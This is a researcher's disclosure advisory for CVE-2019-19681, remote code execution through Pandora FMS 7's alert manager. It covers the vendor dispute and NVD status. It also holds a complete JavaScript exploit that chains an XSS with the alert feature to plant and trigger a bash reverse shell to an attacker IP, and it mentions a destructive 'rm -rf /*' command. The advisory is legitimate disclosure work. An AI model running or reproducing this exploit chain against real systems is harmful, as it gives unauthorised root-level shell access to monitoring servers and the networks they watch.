Back to the advisories

CVE-2019-19681 Pandora FMS 7.xx Remote Code Execution via the Alert Manager

#pandorafms#hacking#rce#cve
Last Modified: 2024.01.19.

If you find it valuable, you can support me by making a donation. Donate now.

Note: I copied the article from medium to my home page, so the content is unchanged.

I found a security vulnerability in PandoraFMS 7 Monitoring System. As an authenticated user it is possible to modify or configure alerts, actions and commands. An alert can be triggered manually and the system will execute the connected commands in the context of the Application. The commands can be modified via the Web Application and it simply accepts everything as a command. I used the alert system to obtain root access on the vendor-provided virtual machine.

I got in touch with the vendor and I sent them the vulnerability report in a secure way. They analysed the vulnerability and a few days later I got an answer:

"we open a ticket with the vulnerability you reported to us and after analysing the situation, we can't limit the use of commands because the functionality is like that. What we have been able to make more restrictive is the user profile that can create the commands. Thank you very much for your contribution!"

I understand the "business" point of view, but I do not agree and I sent them a possible solution. These commands can be defined and stored in a configuration file on the host operating system. The commands can be used in the Web Application, but they are immutable and predefined from the Web Application point of view.

What happend and what is the current status?

I posted the whole thing on medium and I reported it to MITRE/NVD. NVD analyzed it and they said it is a vulnerability and it got an 8.8 CVSS3 score. (CVE-2019-19681)

The vendor came up with the following blog post: (link). They explained in it why my finding is not a security issue. There is an ongoing reanalysis by NVD, so the current status is DISPUTED. (2020.01.28.)

What I think about it?

I think it is a Web Application and it is not allowed to define commands like this even with a Web Admin account. The default configuration is vulnerable and the software documentation does not contain anything about it or anything about the prevention.

I think the firewall part of their explanation is a "half true". E.g: I can store a simple command as a string in their database. The firewall has nothing to do with it and later the system will execute the command. What if the command is just a simple "rm -rf /*" which has no network impact?

If the application is running with www_data rights only and the remote shell or the remote command is just executed as www_data it is still a Remote Code Execution vulnerability.

Update (2021.07.25)

My story has come to an end with Pandora FMS. I revisited all of the CVE-s and here is my last comment about this CVE.

Independently if the alert feature is a vulnerability or not, it can be combined with other vulnerabilities. That can lead to Remote Code Execution, similar to ("CVE-2021-34074").

I made a low-level user with Operator write permission and I used the original XSS for this version (CVE-2019-19968). I chained the XSS vulnerability with the "Alert feature" and obtained remote code execution.

Earlier it was possible to exploit with an admin user, now it is possible with a lower level user too.

Technical Details

The Target IP address was 192.168.0.33 and the Attacker IP address was 192.168.0.37.

1. Login with the default credentials (pandora, admin)

1

2. Create an Alert

2

3. Select the Alerts option of pandorafms

3

4. Add an Alert and select the "Mail to Admin" Action

4

5. Select Commands from the menu

5

6. Add Command

6

7. Configure Mail to Admin

7 8

8. Listen on port 9000

9

9. Trigger the alert manually

10 11 12

10. Proof

13

© 2019-2021 Kamilló Matek All Rights Reserved

2021.07.25 - XSS - Chained Exploit UPDATE

The following picture contains the attack steps:

14

The XSS example:

15

The Target IP address was 192.168.0.90. The Attacker IP address was 192.168.0.99. I used my homepage to store the JavaScript Exploit. Note: The cert is important!

The JavaScript Payload 


/////////////////////////////////////////////////////////////
// Author: k4m1ll0 (matek.kamillo@gmail.com)
// Date: 2021.07.25.
// Pandora FMS 742 XSS + Alert Feature/Alert Vulnerability 
///////////////////////////////////////////////////////////


var IP = '192.168.0.90';
var ATTACKER_IP = '192.168.0.99';
var ATTACKER_PORT = '2000';

function create_new_alert_command()
{
	var xhr = new XMLHttpRequest();
	xhr.open('POST', 'https://' + IP + '/pandora_console/index.php?sec=galertas&sec2=godmode/alerts/alert_commands&pure=0', false);
	params = 'name=k44revshell&command=/bin/bash+-i+>%26+/dev/tcp/' + ATTACKER_IP + '/' + ATTACKER_PORT + '+0>%261&id_group=0&create_command=1&create=Create';
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	xhr.send(params);
	return xhr.response.toString();
}

function find_command_id(s)
{
	var idx = s.indexOf('k44revshell');
	var start_idx = s.indexOf('datos2 \"',idx) + 9;
	var end_idx = s.indexOf('',start_idx);
	return s.substr(start_idx, end_idx - start_idx);
}	

function create_action(command_id)
{
	var xhr = new XMLHttpRequest();
	xhr.open('POST', 'https://' + IP + '/pandora_console/index.php?sec=galertas&sec2=godmode/alerts/alert_actions&pure=0', false);
	params = 'name=K44TESTACTION&group=0&id_command='+ command_id +'&action_threshold=0&create_action=1&create=Create';
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	xhr.send(params);
	return xhr.response.toString();
}

function find_action_id(s)
{
	var idx = s.indexOf('K44TESTACTION');
	var start_idx = s.lastIndexOf('&id=',idx) + 4;
	var end_idx = s.indexOf('&',start_idx);
	return s.substr(start_idx, end_idx-start_idx); 
}

function visit_agents()
{
	var xhr = new XMLHttpRequest();
	xhr.open('GET', 'https://' + IP + '/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/modificar_agente', false);
	xhr.send();
	return xhr.response.toString();	
}


function find_agent_id(s)
{
	var idx = s.indexOf('Pandora FMS Server version 7.0NG.742');
	var start_idx = s.lastIndexOf('id_agente=',idx) + 10;
	var end_idx = s.indexOf('"',start_idx);
	return s.substr(start_idx, end_idx-start_idx); 
}


function create_alert(agent_id, action_id)
{
	var xhr = new XMLHttpRequest();
	xhr.open('POST', 'https://' + IP + '/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=alert&id_agente=' + agent_id, false);
	params = 'id_agent_module=30&action_select=' + action_id + '&template=2&module_action_threshold=0&add=Add+alert&create_alert=1';
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	xhr.send(params);
}

function visit_agent_view(agent_id)
{
	var xhr = new XMLHttpRequest();
	xhr.open('GET', 'https://' + IP + '/pandora_console/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=' + agent_id, false);
	xhr.send();
	return xhr.response.toString();	
}

function find_trigger_url(s)
{
	var idx = s.indexOf('K44TESTACTION');
	var start_idx = s.lastIndexOf('href="index.php?sec=estado',idx) + 6;
	var end_idx = s.indexOf('"',start_idx);
	return s.substr(start_idx, end_idx - start_idx)
}

function trigger_alert(url)
{
	var xhr = new XMLHttpRequest();
	xhr.open('GET', url,false);
	xhr.send();
}

function exploit()
{
	// Step 1 
	var str = create_new_alert_command();
	var command_id = find_command_id(str);

	// Step 2
	str = create_action(command_id);
	var action_id = find_action_id(str);
	
	// Step 3
	str = visit_agents();
	var agent_id = find_agent_id(str);

	// Step 4
	create_alert(agent_id, action_id);

	// Step 5
	str = visit_agent_view(agent_id);
	trigger_url = 'https://' + IP + '/pandora_console/' + find_trigger_url(str);
	trigger_url = trigger_url.replaceAll('&','&');

	// Step 6
	trigger_alert(trigger_url);
}

exploit();

Demonstration Video - Updated

© 2019-2024 Kamilló Matek (k4m1ll0) All Rights Reserved